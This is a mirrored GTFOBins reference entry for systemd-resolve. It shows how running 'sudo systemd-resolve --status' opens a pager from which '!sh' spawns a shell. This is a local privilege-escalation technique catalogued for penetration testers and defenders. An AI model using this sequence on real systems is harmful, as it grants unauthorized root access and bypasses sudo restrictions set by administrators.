mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
9 lines
218 B
Markdown
9 lines
218 B
Markdown
---
|
|
functions:
|
|
sudo:
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
sudo systemd-resolve --status
|
|
!sh
|
|
---
|